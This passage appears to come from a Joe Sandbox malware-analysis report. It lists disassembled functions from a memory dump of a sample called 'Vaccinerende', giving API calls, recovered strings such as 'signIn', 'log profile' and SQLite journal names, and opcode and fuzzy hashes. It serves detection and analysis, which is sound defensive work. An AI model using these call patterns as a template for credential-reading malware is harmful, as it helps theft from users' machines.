                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                              • String ID:
                                                                              • API String ID: 59245283-0
                                                                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                              Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                              • free.MSVCRT ref: 004185AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                              • String ID:
                                                                              • API String ID: 2802642348-0
                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                              Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                              • API String ID: 3510742995-3273207271
                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                              Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                              • memset.MSVCRT ref: 00413ADC
                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                              • memset.MSVCRT ref: 00413BD7
                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                              • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                              • String ID: 3A
                                                                              • API String ID: 3300951397-293699754
                                                                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                              Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                              • String ID: AE$.cfg$General$EA
                                                                              • API String ID: 776488737-1622828088
                                                                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                              Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                              • memset.MSVCRT ref: 0040D906
                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                              • String ID: sysdatetimepick32
                                                                              • API String ID: 1028950076-4169760276
                                                                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                              Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID: -journal$-wal
                                                                              • API String ID: 438689982-2894717839
                                                                              • Opcode ID: 4b2c7d81d4d1854398986e99fc7af02837fb5d8085184165747ed85e7b8d9990
                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                              • Opcode Fuzzy Hash: 4b2c7d81d4d1854398986e99fc7af02837fb5d8085184165747ed85e7b8d9990
                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                              Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Dialog$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3975816621-0
                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                              Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                              • API String ID: 1214746602-2708368587
                                                                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                              Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                              • String ID:
                                                                              • API String ID: 2313361498-0
                                                                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                              Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                              • String ID:
                                                                              • API String ID: 2047574939-0
                                                                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                              Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID: gj
                                                                              • API String ID: 438689982-4203073231
                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                              Function 0040BDB0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                              • memset.MSVCRT ref: 0040BE91
                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                              • String ID:
                                                                              • API String ID: 161710377-0
                                                                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                              Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                              • API String ID: 3510742995-2446657581
                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                              Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                              • memset.MSVCRT ref: 00405ABB
                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$FocusItemmemset
                                                                              • String ID:
                                                                              • API String ID: 4281309102-0
                                                                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                              Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfwcscat
                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                              • API String ID: 384018552-4153097237
                                                                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
